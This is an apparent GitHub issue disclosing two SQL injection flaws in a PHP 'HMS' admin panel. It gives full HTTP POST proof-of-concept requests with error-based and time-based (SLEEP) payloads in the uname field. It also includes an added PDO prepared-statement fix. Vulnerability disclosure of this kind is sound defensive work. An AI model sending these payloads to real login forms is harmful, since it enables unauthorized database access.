
HMS has two SQL injection vulnerabilities #1

Closed
huclilu opened this issue Nov 9, 2022 · 0 comments

huclilu commented Nov 9, 2022

Hello, my brother

HMS has two SQL injection vulnerabilities

Build environment: Apache 2.4.39; MySQL 5.7.26; PHP 7.3.4

1. SQL injection vulnerability in adminlogin.php

In admin/adminlogin.php, line 6 - line 34

The front-end POST request passes uname and pass to the back end, which assigns them to $username and $password respectively.

Without any filtering, $username and $password are used directly in the database query to check them against the username and password stored in the database.

However, these variables are user-controllable, so the account and password typed into the input box are carried into the executed SQL statement, resulting in an SQL injection vulnerability.

1. We can use sqlmap to validate

2. Manual SQL injection proof

  • POC
POST /adminlogin.php HTTP/1.1
Host: vulhms.test
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulhms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulhms.test/adminlogin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=p8jp2ja2hfplhfopqh577o2nd1
Connection: close

uname=' OR (SELECT 12 FROM(SELECT COUNT(*),CONCAT(USER(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ace&pass=admin123&login=Login

2. SQL injection vulnerability in admin.php

In admin/admin.php, uname and pass are assigned to the variables $uname and $pass, which are then passed into the database query, causing an SQL injection vulnerability.

1. We can use sqlmap to validate

2. Manual SQL injection proof

  • SQL injection delay 5s

  • SQL injection delay 10s

POC:

POST /admin/admin.php HTTP/1.1
Host: vulhms.test
Content-Length: 373
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulhms.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryANszhVvLtYgiU33l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulhms.test/admin/admin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=p8jp2ja2hfplhfopqh577o2nd1
Connection: close

------WebKitFormBoundaryANszhVvLtYgiU33l
Content-Disposition: form-data; name="uname"

admin' RLIKE SLEEP(5) AND 'ace'='ace
------WebKitFormBoundaryANszhVvLtYgiU33l
Content-Disposition: form-data; name="pass"

123123
------WebKitFormBoundaryANszhVvLtYgiU33l
Content-Disposition: form-data; name="add"

Add New Admin
------WebKitFormBoundaryANszhVvLtYgiU33l--
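For reference, an added example written by the editor (not HMS code) of how the pattern reported in both issues above can be closed: the reported shape, with the POST values concatenated into the query, beside a login handler that uses PDO prepared statements and password_verify(). The table and column names (admin, id, username, password_hash), the DSN and the credentials are assumptions.

```php
<?php
// Added example, not the project's code. Illustrates the defect reported above and its fix.
// Assumed schema: table `admin` with columns `id`, `username`, `password_hash`.
session_start();

// --- Reported pattern (do not use): request values concatenated straight into SQL ---
// $username = $_POST['uname'];
// $password = $_POST['pass'];
// $sql = "SELECT * FROM admin WHERE username='$username' AND password='$password'";
// A single quote in uname ends the string literal and the remainder of the value is parsed
// as SQL, which is what the sqlmap run and the manual RLIKE SLEEP() test above rely on.

// --- Hardened version: placeholders keep data and SQL separate ---
function adminLogin(PDO $db, string $uname, string $pass): ?int
{
    // The query text and the bound value travel separately, so quotes, comment markers
    // or SLEEP() inside $uname are only ever compared as data, never parsed as SQL.
    $stmt = $db->prepare('SELECT id, password_hash FROM admin WHERE username = :u LIMIT 1');
    $stmt->execute([':u' => $uname]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Passwords are stored as password_hash() output, not plain text; password_verify()
    // does a constant-time comparison. Same failure path for unknown user and bad password.
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

// Assumed connection settings. Emulated prepares are disabled so MySQL binds the values
// server-side instead of the PHP driver interpolating them into the query string.
$db = new PDO('mysql:host=localhost;dbname=hms;charset=utf8mb4', 'hms_user', 'hms_password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

$uname = $_POST['uname'] ?? '';
$pass  = $_POST['pass']  ?? '';

$adminId = adminLogin($db, $uname, $pass);
if ($adminId === null) {
    http_response_code(401);
    exit('Invalid username or password');
}
session_regenerate_id(true);          // new session id after privilege change
$_SESSION['admin_id'] = $adminId;
```

The same change applies to the uname/pass handling in admin/admin.php: every value that originates in the request goes through a bound parameter rather than into the query string.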
huclilu closed this as completed Nov 13, 2022